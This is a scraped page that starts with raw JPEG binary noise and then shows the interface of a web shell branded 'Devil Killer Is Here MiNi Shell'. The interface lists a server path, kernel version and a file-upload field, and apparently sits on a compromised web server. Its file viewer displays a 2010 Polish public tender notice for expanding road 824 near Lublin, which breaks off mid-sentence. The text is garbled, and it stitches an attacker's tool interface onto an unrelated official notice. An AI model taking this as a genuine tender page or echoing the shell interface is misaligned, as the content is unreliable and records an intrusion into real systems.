JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100827/233335-N-2010.html

<p class="kh_header"><b>Lublin: Rozbudowa drogi wojewódzkiej Nr 824 Żyrzyn- Puławy- Opole Lubelskie- Józefów- Annopol na odcinku od km 21+404,00 
do km 22+577,34 o dł. 1,173 km</b><br>
<b>Numer ogłoszenia: 233335 - 2010; data zamieszczenia: 27.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Turystyczna 7A, 20-207 Lublin, woj. lubelskie, tel. 081 7495300, faks 081 7495341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa drogi wojewódzkiej Nr 824 Żyrzyn- Puławy- Opole Lubelskie- Józefów- Annopol na odcinku od km 21+404,00 
do km 22+577,34 o dł. 1,173 km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE OBEJMUJE NASTĘPUJĄCE ROBOTY:

BRANŻA DROGOWA 

-	Roboty przygotowawcze
	roboty pomiarowe
	mechaniczne usunięcie ziemi urodzajnej
	rozbiórki elementów dróg i ulic, 
-	Roboty ziemne
	wykonanie wykopów i nasypów,
-	Podbudowy
	koryto wraz z profilowaniem i zagęszczeniem podłoża
	czyszczenie i skropienie warstw konstrukcyjnych
	podbudowa z kruszywa stabilizowanego mechanicznie
	podbudowa z gruntu stabilizowanego cementem
	podbudowa z betonu
	podbudowa z betonu asfaltowego
	warstwa wyrównawcza z kruszywa łamanego stabilizowanego mechanicznie,
-	Nawierzchnie
	poboczy z kruszywa
	ułożenie warstwy pośredniej z geosiatki poliestrowej
	nawierzchnie z betonu asfaltowego
	nawierzchnie z mieszanki grysowo- mastyksowej SMA
	nawierzchnie z kostki brukowej betonowej,
-	Elementy ulic
	ustawienie krawężników betonowych 
	wykonanie chodników, nawierzchni wjazdów i opaski ronda z kostki brukowej betonowej
	ustawienie obrzeży
	regulacja wysokościowa włazów istniejących studni rewizyjnych i skrzynek na zasuwy,
-	Oznakowanie dróg i urządzenia bezpieczeństwa ruchu
	oznakowanie poziome materiałami grubowarstwowymi
	oznakowanie pionowe,
	inne urządzenia bezpieczeństwa ruchu,
-	Zieleń drogową				
	mechaniczne ścinanie drzew wraz z karczowaniem pni
	mechaniczne karczowanie krzaków
	sadzenie krzewów
	wykonanie trawników
	obsianie skarp w ziemi urodzajnej.

BRANŻA MOSTOWA 
					 
-	Remont mostu
	odtworzenie dodatkowej płyty żelbetowej z betonu klasy B-30 zespolonej z istniejącą płytą pomostu
	wykonanie wzmocnienia podpór oraz wykonanie płyt przejściowych z betonu klasy B- 30
	wykonanie sączków odwadniających jezdnię
	wykonanie płyt przejściowych
	ustawienie barieroporęczy
	wykonanie nawierzchni epoksydowej na chodnikach mostowych
	wykonanie schodów, ścieków oraz poprawa obrukowania stożków
	wykonanie nawierzchni na moście,
-	Wydłużenie  istniejącego przepustu skrzynkowego
	rozebranie istniejących ścianek czołowych
	wydłużenie przepustu przy zastosowaniu prefabrykowanych elementów żelbetowych
	wykonanie żelbetowych ścianek czołowych.
 
BRANŻA SANITARNA 				

-	Kanalizacja deszczowa
	roboty rozbiórkowe nawierzchni
	wykonanie wykopów z pełnym umocnieniem ścian
	rurociągi kanalizacyjne z tworzyw sztucznych
	studnie ściekowe z tworzyw sztucznych                                                                                                                                      
	studnie rewizyjne z tworzyw sztucznych
	zasypka wykopów,
-	Przebudowa sieci gazowej
	wykonanie wykopów z pełnym umocnieniem ścian
	sieć gazowa s/c z rur PE
	zasypka wykopów,
-	Przebudowa sieci kanalizacji sanitarnej
	wykonanie wykopów z pełnym umocnieniem ścian
	rurociągi kanalizacyjne z tworzyw sztucznych
	studnie rewizyjne z kręgów betonowych
	zasypka wykopów.

BRANŻA ENERGETYCZNA 				

-	 Budowa oświetlenia ulicznego
	ręczne kopanie rowów dla kabli
	układanie kabli w rowach kablowych
	montaż i stawianie słupów oświetleniowych,
-	Usunięcie kolizji energetycznych
             demontaż linii napowietrznej
	montaż i stawianie słupów linii napowietrznej NN
	montaż przewodów
	przyłącza napowietrzne.

BRANŻA TELEKOMUNIKACYJNA 			
	budowa i przebudowa studni kablowych prefabrykowanych
	budowa kanalizacji kablowej
	wciąganie kabla wypełnionego w powłoce termoplastycznej i kabli światłowodowych do kanalizacji kablowej.

2.	Szczegółowy zakres robót ujęty jest w projektach budowlanych i wykonawczych w Szczegółowych specyfikacjach Technicznych oraz w przedmiarze robót stanowiącym część pomocniczą określenia ilości robót.
3.	Wykonawca zobowiązany jest do opracowania i zatwierdzenia planu bezpieczeństwa 
i ochrony zdrowia i programu zapewnienia jakości.
4.	W załączeniu do oferty Wykonawca złoży wstępny harmonogram robót. Szczegółowy harmonogram rzeczowo- finansowy i harmonogram płatności Wykonawca złoży 
w terminie 21 dni od daty podpisania umowy.
5.	Zgodnie z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane roboty budowlane spełniają wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy).
Całkowita wartość zamówienia wynosi :4.436.705,48 zł netto..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających stosownie do art. 67 ust. 1 pkt 6.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.23.00.00-8, 45.23.30.00-9, 45.10.00.00-8, 45.11.27.10-5, 45.22.10.00-2, 45.23.10.00-5, 45.23.14.00-9, 45.23.23.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości 
45.000,00 zł. (słownie złotych: czterdzieści pięć tysięcy 00/100) 
2.	Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo zamówień publicznych.
3.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW 
w Lublinie w Kredyt Banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000.
4.	W ofercie należy złożyć dokument potwierdzający wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykonać w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 3 zadań na drogach kategorii nie niższej niż G,  o  wartości robót drogowych  minimum 3.000.000 zł netto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien dysponować jednostkami sprzętu i środkami transportu wymienionymi poniżej:
1.Koparka o pojemności łyżki 0,25 m3  i więcej- min 2szt.,
2.Ładowarka o pojemności łyżki 0,75 m3- min1szt.,
3.Spycharka o mocy 75 KM- min 1szt.,
4. Samochód skrzyniowy o ładowności 5 t lub więcej- min 2szt.,
5. Samochód samowyładowczy  o ładowności min 10 t (z możliwością przykrycia brezentem) - min 2 szt.,
6. Żuraw samochodowy o udźwigu 5- 6 t- min 1 szt.,
7. Zagęszczarki mechaniczne-min 3 szt.,
8.Walec samojezdny ogumiony średni- min 1 szt.,
9. Walec samojezdny stalowy statyczny 10 t - min 1szt.,
10. Walec samojezdny stalowy 15 t- min 1 szt.,
11. Skrapiarka do bitumu- min 1 szt.,
12. Rozkładarka mas bitumicznych z możliwością wstępnego zagęszczenia, z możliwością ułożenia nawierzchni maksymalnie dwoma przejściami na całej szerokości, z elektronicznym sterowaniem, wyposażona w urządzenia pomiarowo- kontrolne	- min 1 szt.,
13Frezarka drogowa ze sterowaniem elektronicznym lub mechanicznym- min 1.,
14. Wytwórnia mas bitumicznych o wydajności min 100 Mg/ h*- min 1szt.,

*Uwaga!
Zamawiający wymaga wskazania lokalizacji wytwórni mas bitumicznych. Lokalizacja winna spełniać warunek czasu transportu mas bitumicznych od momentu załadowania do momentu rozpoczęcia rozładunku (do 2 godz.). W przypadku wątpliwości spełnienia tego warunku Zamawiający zastrzega sobie możliwość praktycznego sprawdzenia. Odległość należy liczyć od wytwórni do najdalszego miejsca robót po drogach umożliwiających przejazd samochodów o ładowności minimum 10 ton.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien dysponować osobą przewidzianą do pełnienia funkcji:
a)	Kierownika budowy - posiadającą uprawnienia budowlane branży drogowej bez ograniczeń oraz doświadczenie przy pełnieniu funkcji kierownika budowy/robót na minimum dwóch zadaniach, których wartość robót drogowych w każdym zadaniu wynosiła minimum 2.000.000 zł netto.
b)	Kierownika robót:
- posiadającą uprawnienie budowlane branży sanitarnej w zakresie sieci kanalizacyjnych i gazowych bez ograniczeń,
- posiadającą uprawnienia budowlane branży elektrycznej bez ograniczeń,
- posiadającą uprawnienia budowlane branży telekomunikacyjnej bez ograniczeń,
- posiadającą uprawnienia budowlane branży mostowe bez ograniczeń.

Osoby przewidziane do pełnienia samodzielnych funkcji technicznych 
w budownictwie muszą posiadać wymagane uprawnienia, które zostały wydane  zgodnie z ustawą prawo budowlane z dnia 7 lipca 1994 r. (z późn. zmianami) art. 12 ustęp 1 ppkt. 2, ustęp 7, art. 12 a  lub uprawnienia uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy prawo budowlane 
z 1994 r, natomiast w przypadku osób które uzyskały uprawnienia w innych krajach Unii Europejskiej posiadane uprawnienia muszą spełniać warunki określone  w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej 
(Dz. U. Nr  63,poz. 394).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto, oprócz oświadczeń lub dokumentów jakich należy dostarczyć w celu potwierdzenia spełniania warunków udziału,  Wykonawca obowiązany jest dołączyć do oferty:
a)	dowód wniesienia wadium.
b)	ofertę przetargową (z ceną netto i z podatkiem VAT) wraz 
z załączonym Kosztorysem ofertowym.
c)	Wykaz części zamówienia, których wykonanie Wykonawca zamierza zlecić podwykonawcy.
d)	 w przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
e)	w przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.
f)	wstępny harmonogram robót
g)	wykaz stawek i narzutów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty polegających na: 
1. Zmiany rozwiązań technicznych w dokumentacji projektowej  wykonania zamówienia i 
     terminu zakończenia robót:
a) Na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie prowadzenia inwestycji, mogą być dokonywane zmiany technologii wykonywania elementów robót. Dopuszcza się je tylko w przypadku, gdy proponowane przez niego rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje projekt a Wykonawca nie będzie żądał zwiększenia wynagrodzenia za wykonywane roboty.
         W tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis      
         proponowanych zmian wraz z rysunkami. Projekt wymaga zatwierdzenia przez nadzór 
         autorski/ projektanta/, uzgodnienia z inspektorem nadzoru i akceptacji Zamawiającego. Powyższe  zmiany nie dotyczą terminu zakończenia robót.
b) W przypadku gdy wystąpią roboty dodatkowe  nie objęte zamówieniem podstawowym  niezbędne do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i nie mające wpływu na termin zakończenia zamówienia podstawowego, Zamawiający złoży  dodatkowe zamówienie na ich wykonanie w trybie wynikającym z Ustawy Prawo Zamówień Publicznych. 
   Zmiana będzie dotyczyć tylko zmian technicznych w dokumentacji projektowej. 
c)	W przypadku gdy wystąpią roboty dodatkowe nieprzewidziane w dokumentacji projektowej lub kolizje  nie objęte zamówieniem podstawowym a konieczne do wykonania przed robotami podstawowymi Zamawiający złoży  dodatkowe zamówienie na ich wykonanie w trybie wynikającym z Ustawy Prawo Zamówień Publicznych. 
Zmiana będzie dotyczyć  zmian technicznych w dokumentacji projektowej i terminu zakończenia zamówienia podstawowego.
d) W uzasadnionych przypadkach gdy realizacja zadania według dokumentacji technicznej i SST powodowałoby wadliwe wykonanie przedmiotu umowy dopuszcza się wprowadzenie zmian  w  stosunku do dokumentacji projektowej bez zmiany terminu zakończenia robót.
e) W przypadku gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych nie przewidzianych w umowie, Zamawiający sporządza protokół konieczności, a następnie  dostarcza dokumentację projektową na te roboty.
2.  Zmiany terminu zakończenia zamówienia podstawowego 
1) Spowodowane warunkami atmosferycznymi:
a)	Klęski żywiołowe
b)	Gdy warunki atmosferyczne odbiegają od warunków określonych w SST i uniemożliwiają prowadzenie robót budowlanych przeprowadzanie prób i sprawdzeń oraz dokonywanie odbiorów
2) Spowodowane warunkami geologicznymi, archeologicznymi 
a)	Niewybuchy, niewypały
b)	Wykopaliska archeologiczne
3.	 Zmiany dotyczące zakresu robót i wynagrodzenia 
a)	nieprzewidziane kolizje z robotami prowadzonymi równolegle przez inne podmioty. 
W takim przypadku zmiany w umowie zostaną ograniczone do zmian powodujących  uniknięcie lub usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii, lokalizacji wbudowywanych urządzeń oraz zmiana terminu 
i wynagrodzenia.
b)	okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia. W przypadku 
zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne wykonawcy za wykonane roboty pozostaje w takim stosunku do umownego wynagrodzenia ryczałtowego, w jakim wykonane roboty budowlane pozostają do całości robót wyszczególnionych w łączącej strony umowie. Zmiana wartości ustalona zostanie na podstawie kosztorysu ofertowego.
c)	zmianie ulegnie stawka podatku VAT
d)	w przypadku wystąpienia siły wyższej której strony nie mogły przewidzieć, której nie mogły zapobiec ani której nie mogą przeciwdziałać, a która uniemożliwia Wykonawcy wykonanie w części lub całości jego zobowiązań.
4.  Zmiany osobowe 
         a) zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne     
             spełniające warunki określone w SIWZ
         b) Zamawiający dopuszcza możliwość wyrażenia zgody na wykonywanie robót przez 
              podwykonawców nie wskazanych w ofercie lub zakres nie wskazany w ofercie jako 
              planowany do powierzenia podwykonawcom. Zamiana taka nie wymaga aneksu do      
              umowy i może być przeprowadzona przy zachowaniu procedury zatwierdzenia       
              podwykonawców wynikającej z przepisów prawa i SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego, lok. 203, lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres:dzp@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2010 godzina 08:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, ul. Turystyczna 7a, pok. 107 Otwarcie ofert nastąpi w dniu 10.09.2010 o godz.08:30 w pok. 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr (81) 749-53-41; (81) 749-53-77 lub drogą elektroniczną na adres e-mail: dzp@zdw.lublin.pl. 
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.

Osoby uprawnione do porozumiewania się z wykonawcami: 
1.	W sprawach technicznych - Wydział Budowy, inż. Jan Bolibok, tel. (0-81) 749-53-25.
2. 	W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia 
i zawarciem umowy - Wydział Umów, mgr inż. Sławomir Szepietowski, tel. (081) 
749-53-44; 749-53-29.
UWAGA: 
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są 
